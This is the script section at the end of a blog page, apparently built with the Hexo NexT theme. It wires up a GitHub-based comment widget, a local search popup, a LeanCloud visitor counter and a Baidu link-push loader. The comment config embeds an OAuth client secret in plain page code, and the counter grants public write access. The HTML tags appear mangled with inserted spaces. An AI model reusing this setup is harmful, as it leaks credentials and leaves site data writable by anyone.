< script type = "text/javascript" src = "/js/src/bootstrap.js?v=5.1.4" > < / script >
<!-- LOCAL: You can save these files to your site and update links -->
< link rel = "stylesheet" href = "https://jjeejj.github.io/css/gitment.css" >
< script src = "https://jjeejj.github.io/js/gitment.js" > < / script >
<!-- END LOCAL -->
< script type = "text/javascript" >
function renderGitment(){
var gitment = new Gitment({
id: window.location.pathname,
owner: 'Cool-Y',
repo: 'gitment-comments',
oauth: {
client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
client_id: '180955a2c3ae3d966d9a'
}});
gitment.render('gitment-container');
}
renderGitment();
< / script >
< script type = "text/javascript" >
// Popup Window;
var isfetched = false;
var isXml = true;
// Search DB path;
var search_path = "search.xml";
if (search_path.length === 0) {
search_path = "search.xml";
} else if (/json$/i.test(search_path)) {
isXml = false;
}
var path = "/" + search_path;
// monitor main search box;
var onPopupClose = function (e) {
$('.popup').hide();
$('#local-search-input').val('');
$('.search-result-list').remove();
$('#no-result').remove();
$(".local-search-pop-overlay").remove();
$('body').css('overflow', '');
}
function proceedsearch() {
$("body")
.append('< div class = "search-popup-overlay local-search-pop-overlay" > < / div > ')
.css('overflow', 'hidden');
$('.search-popup-overlay').click(onPopupClose);
$('.popup').toggle();
var $localSearchInput = $('#local-search-input');
$localSearchInput.attr("autocapitalize", "none");
$localSearchInput.attr("autocorrect", "off");
$localSearchInput.focus();
}
// search function;
var searchFunc = function(path, search_id, content_id) {
'use strict';
// start loading animation
$("body")
.append('< div class = "search-popup-overlay local-search-pop-overlay" > ' +
'< div id = "search-loading-icon" > ' +
'< i class = "fa fa-spinner fa-pulse fa-5x fa-fw" > < / i > ' +
'< / div > ' +
'< / div > ')
.css('overflow', 'hidden');
$("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
$.ajax({
url: path,
dataType: isXml ? "xml" : "json",
async: true,
success: function(res) {
// get the contents from search data
isfetched = true;
$('.popup').detach().appendTo('.header-inner');
var datas = isXml ? $("entry", res).map(function() {
return {
title: $("title", this).text(),
content: $("content",this).text(),
url: $("url" , this).text()
};
}).get() : res;
var input = document.getElementById(search_id);
var resultContent = document.getElementById(content_id);
var inputEventFunction = function() {
var searchText = input.value.trim().toLowerCase();
var keywords = searchText.split(/[\s\-]+/);
if (keywords.length > 1) {
keywords.push(searchText);
}
var resultItems = [];
if (searchText.length > 0) {
// perform local searching
datas.forEach(function(data) {
var isMatch = false;
var hitCount = 0;
var searchTextCount = 0;
var title = data.title.trim();
var titleInLowerCase = title.toLowerCase();
var content = data.content.trim().replace(/< [^>]+>/g,"");
var contentInLowerCase = content.toLowerCase();
var articleUrl = decodeURIComponent(data.url);
var indexOfTitle = [];
var indexOfContent = [];
// only match articles with not empty titles
if(title != '') {
keywords.forEach(function(keyword) {
function getIndexByWord(word, text, caseSensitive) {
var wordLen = word.length;
if (wordLen === 0) {
return [];
}
var startPosition = 0, position = [], index = [];
if (!caseSensitive) {
text = text.toLowerCase();
word = word.toLowerCase();
}
while ((position = text.indexOf(word, startPosition)) > -1) {
index.push({position: position, word: word});
startPosition = position + wordLen;
}
return index;
}
indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
});
if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
isMatch = true;
hitCount = indexOfTitle.length + indexOfContent.length;
}
}
// show search results
if (isMatch) {
// sort index by position of keyword
[indexOfTitle, indexOfContent].forEach(function (index) {
index.sort(function (itemLeft, itemRight) {
if (itemRight.position !== itemLeft.position) {
return itemRight.position - itemLeft.position;
} else {
return itemLeft.word.length - itemRight.word.length;
}
});
});
// merge hits into slices
function mergeIntoSlice(text, start, end, index) {
var item = index[index.length - 1];
var position = item.position;
var word = item.word;
var hits = [];
var searchTextCountInSlice = 0;
while (position + word.length < = end & & index.length != 0) {
if (word === searchText) {
searchTextCountInSlice++;
}
hits.push({position: position, length: word.length});
var wordEnd = position + word.length;
// move to next position of hit
index.pop();
while (index.length != 0) {
item = index[index.length - 1];
position = item.position;
word = item.word;
if (wordEnd > position) {
index.pop();
} else {
break;
}
}
}
searchTextCount += searchTextCountInSlice;
return {
hits: hits,
start: start,
end: end,
searchTextCount: searchTextCountInSlice
};
}
var slicesOfTitle = [];
if (indexOfTitle.length != 0) {
slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
}
var slicesOfContent = [];
while (indexOfContent.length != 0) {
var item = indexOfContent[indexOfContent.length - 1];
var position = item.position;
var word = item.word;
// cut out 100 characters
var start = position - 20;
var end = position + 80;
if(start < 0 ) {
start = 0;
}
if (end < position + word . length ) {
end = position + word.length;
}
if(end > content.length){
end = content.length;
}
slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
}
// sort slices in content by search text's count and hits' count
slicesOfContent.sort(function (sliceLeft, sliceRight) {
if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
return sliceRight.searchTextCount - sliceLeft.searchTextCount;
} else if (sliceLeft.hits.length !== sliceRight.hits.length) {
return sliceRight.hits.length - sliceLeft.hits.length;
} else {
return sliceLeft.start - sliceRight.start;
}
});
// select top N slices in content
var upperBound = parseInt('1');
if (upperBound >= 0) {
slicesOfContent = slicesOfContent.slice(0, upperBound);
}
// highlight title and content
function highlightKeyword(text, slice) {
var result = '';
var prevEnd = slice.start;
slice.hits.forEach(function (hit) {
result += text.substring(prevEnd, hit.position);
var end = hit.position + hit.length;
result += '< b class = "search-keyword" > ' + text.substring(hit.position, end) + '< / b > ';
prevEnd = end;
});
result += text.substring(prevEnd, slice.end);
return result;
}
var resultItem = '';
if (slicesOfTitle.length != 0) {
resultItem += "< li > < a href = '" + articleUrl + "' class = 'search-result-title' > " + highlightKeyword(title, slicesOfTitle[0]) + "< / a > ";
} else {
resultItem += "< li > < a href = '" + articleUrl + "' class = 'search-result-title' > " + title + "< / a > ";
}
slicesOfContent.forEach(function (slice) {
resultItem += "< a href = '" + articleUrl + "' > " +
"< p class = \"search-result\" > " + highlightKeyword(content, slice) +
"...< / p > " + "< / a > ";
});
resultItem += "< / li > ";
resultItems.push({
item: resultItem,
searchTextCount: searchTextCount,
hitCount: hitCount,
id: resultItems.length
});
}
})
};
if (keywords.length === 1 & & keywords[0] === "") {
resultContent.innerHTML = '< div id = "no-result" > < i class = "fa fa-search fa-5x" / > < / div > '
} else if (resultItems.length === 0) {
resultContent.innerHTML = '< div id = "no-result" > < i class = "fa fa-frown-o fa-5x" / > < / div > '
} else {
resultItems.sort(function (resultLeft, resultRight) {
if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
return resultRight.searchTextCount - resultLeft.searchTextCount;
} else if (resultLeft.hitCount !== resultRight.hitCount) {
return resultRight.hitCount - resultLeft.hitCount;
} else {
return resultRight.id - resultLeft.id;
}
});
var searchResultList = '< ul class = \"search-result-list\" > ';
resultItems.forEach(function (result) {
searchResultList += result.item;
})
searchResultList += "< / ul > ";
resultContent.innerHTML = searchResultList;
}
}
if ('auto' === 'auto') {
input.addEventListener('input', inputEventFunction);
} else {
$('.search-icon').click(inputEventFunction);
input.addEventListener('keypress', function (event) {
if (event.keyCode === 13) {
inputEventFunction();
}
});
}
// remove loading animation
$(".local-search-pop-overlay").remove();
$('body').css('overflow', '');
proceedsearch();
}
});
}
// handle and trigger popup window;
$('.popup-trigger').click(function(e) {
e.stopPropagation();
if (isfetched === false) {
searchFunc(path, 'local-search-input', 'local-search-result');
} else {
proceedsearch();
};
});
$('.popup-btn-close').click(onPopupClose);
$('.popup').click(function(e){
e.stopPropagation();
});
$(document).on('keyup', function (event) {
var shouldDismissSearchPopup = event.which === 27 & &
$('.search-popup').is(':visible');
if (shouldDismissSearchPopup) {
onPopupClose();
}
});
< / script >
< script src = "https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js" > < / script >
< script > AV . initialize ( "EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz" , "x8FxDrYG79C8YFrTww9ljo8K" ) ; < / script >
< script >
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length ; i + + ) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length ; i + + ) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
< / script >
< script >
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
< / script >
< / body >
< / html >